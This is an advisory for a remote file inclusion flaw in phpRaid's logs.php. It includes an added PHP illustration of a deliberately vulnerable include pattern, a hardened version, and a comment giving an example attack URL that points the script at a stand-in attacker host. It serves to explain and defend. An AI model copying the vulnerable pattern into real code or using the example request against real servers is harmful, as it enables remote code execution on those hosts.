phpRaid logs.php phpraid_dir Variable Remote File Inclusion

2006-06-29T06:34:08
ID OSVDB:26903
Type osvdb
Reporter Sven Krewitt (remove-vuln@secunia.com)
Modified 2006-06-29T06:34:08

Description

Vulnerability Description

phpRaid contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the logs.php script not properly sanitizing user input supplied to the 'phpraid_dir' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002). With register_globals on, the request parameter phpraid_dir is copied into the global variable $phpraid_dir before the script runs, so whatever the script later includes relative to that variable is under the attacker's control. Fetching the included file from a remote host additionally requires that the PHP installation permits include() of URLs (allow_url_fopen, and on PHP 5.2.0 and later also allow_url_include).
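The following PHP is an added illustration of the flaw class described above and of its fix; it is not phpRaid's source code. Only the variable name phpraid_dir and the register_globals precondition come from the advisory; the included file name and the shape of the surrounding code are assumptions.

```php
<?php
// Added illustration, not phpRaid's actual logs.php. The name phpraid_dir
// comes from the advisory; 'lib/common.php' and the surrounding code are
// assumptions made for the example.

// --- Vulnerable shape (assumed) -------------------------------------------
// With register_globals=On, a request such as
//   logs.php?phpraid_dir=http://attacker.example/dir
// pre-populates $phpraid_dir before any line of the script runs. If the
// script only fills it in when it is unset, the request value survives and
// include() fetches and executes the attacker's file (when URL includes are
// permitted by allow_url_fopen / allow_url_include).
function vulnerable_include()
{
    global $phpraid_dir;
    if (!isset($phpraid_dir)) {
        $phpraid_dir = '.';            // never reached if the request set it
    }
    include($phpraid_dir . '/lib/common.php');
}

// --- Hardened shape --------------------------------------------------------
// 1. Derive the base directory from the script's own location and assign it
//    unconditionally, so no request variable can pre-empt it.
// 2. As defence in depth, refuse to run at all if register_globals is on:
//    every other global in the script is equally exposed.
function hardened_include()
{
    if (ini_get('register_globals')) {
        die('Fatal: register_globals must be Off');
    }
    $phpraid_dir = dirname(__FILE__);  // __DIR__ on PHP >= 5.3
    include($phpraid_dir . '/lib/common.php');
}

// Quick check for the two settings the advisory's attack depends on; run as
//   php -r 'include "this_file.php"; report_ini();'
function report_ini()
{
    foreach (array('register_globals', 'allow_url_fopen', 'allow_url_include') as $k) {
        $v = ini_get($k);
        echo str_pad($k, 20), ($v === false ? 'n/a' : ($v ? 'On' : 'Off')), "\n";
    }
}
```

The hardened version does not try to validate $phpraid_dir; a directory that the application computes itself needs no validation, and removing the request's influence entirely is simpler and more robust than filtering it. The ini report is the check a reviewer would run on a host before deciding whether an instance with the old version is actually exposed.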

Solution Description

Upgrade to version 3.0.6 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds within the application itself; disabling register_globals at the PHP level removes the precondition for this flaw but is a server configuration change, not a fix to phpRaid.

Short Description

phpRaid contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the logs.php script not properly sanitizing user input supplied to the 'phpraid_dir' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

References:

Vendor URL: http://www.spiffyjr.com/
Secunia Advisory ID: 20200
Related OSVDB IDs: 26886, 26887, 26888, 26890, 26891, 26892, 26893, 26894, 26895, 26896, 26897, 26898, 26899, 26900, 26901, 26902, 26904
Other Advisory URL: http://secunia.com/secunia_research/2006-47/advisory/
Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-06/0824.html
CVE: CVE-2006-3316